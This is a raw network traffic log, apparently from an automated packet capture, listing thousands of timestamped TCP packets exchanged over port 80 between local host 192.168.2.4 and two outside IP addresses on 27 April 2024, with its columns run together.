                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833710909 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833744049 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833781958 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833787918 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833822012 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833870888 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833894968 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833934069 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833971977 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.833982944 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834012985 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834050894 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834064960 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834095955 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834135056 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834146976 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834175110 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834213972 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834218025 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834253073 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834291935 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834296942 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834331989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834368944 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834372044 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834408045 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834444046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834466934 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834482908 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834522009 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834530115 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834561110 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834599972 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834610939 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834638119 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834676027 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834683895 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834716082 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834754944 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834762096 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834794044 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834831953 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834832907 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834880114 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834918976 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834928989 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834959030 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.834996939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.835005999 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.835036993 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.835074902 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.835083008 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.835114002 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.835153103 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.856458902 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.858411074 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.858460903 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.858499050 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.858534098 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.858566999 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.858603001 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.997889042 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.997992039 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027544022 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027704000 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027744055 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027759075 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027785063 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027823925 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027832985 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027861118 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027900934 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027913094 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027940989 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.027997017 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028069019 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028142929 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028182983 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028212070 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028222084 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028260946 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028300047 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028322935 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028337955 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028376102 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028382063 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028414011 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028451920 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028461933 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028507948 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028523922 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028563023 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.028687954 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.029088020 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.029126883 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.029165030 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.029206038 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.029206038 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.029254913 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030234098 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030272007 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030311108 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030334949 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030349016 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030388117 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030425072 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030446053 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030484915 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030491114 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030523062 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030561924 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030601978 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030636072 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030641079 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030661106 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030678988 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030716896 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030729055 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030755043 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030793905 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030831099 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030844927 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030870914 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030879974 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030910969 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030949116 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.030973911 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031021118 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031059980 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031097889 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031117916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031136990 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031140089 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031197071 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031205893 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031245947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031259060 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031286001 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031296015 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031326056 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031337976 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031364918 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031377077 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031403065 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031411886 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031441927 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031450033 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031481981 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031487942 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031522036 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031532049 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031560898 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031567097 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031605005 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031609058 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031644106 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031682968 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031694889 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031721115 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031763077 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031774044 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031801939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031819105 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031841993 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031873941 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031881094 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031908989 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031917095 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031923056 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031955957 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031989098 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.031996012 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032035112 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032043934 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032073021 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032114029 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032130003 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032170057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032207966 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032244921 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032280922 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032319069 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032356024 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032393932 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032432079 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032469034 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032486916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032486916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032486916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032486916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032486916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032486916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032486916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032486916 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032510996 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032510996 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032510996 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032551050 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032557011 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032596111 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032613039 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032638073 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032645941 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032676935 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032691956 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032713890 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032721043 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032752037 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032764912 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032788992 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032804966 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032826900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032840967 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032865047 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032880068 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032902956 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032913923 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032943010 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032953978 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032983065 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.032989979 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033020973 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033030033 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033058882 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033061981 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033097029 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033134937 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033145905 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033174038 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033185959 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033212900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033237934 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033251047 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033274889 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033288956 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033302069 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033328056 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033337116 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033365011 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033371925 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033405066 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033411026 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033443928 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033457994 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033482075 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033497095 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033521891 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033533096 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033560038 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033571959 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033598900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033607006 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033638000 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033647060 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033677101 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033683062 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033715963 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033724070 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033754110 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033761978 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033792973 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033799887 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033829927 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033838987 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033868074 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033876896 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.033905983 CEST8049734176.97.76.106192.168.2.4
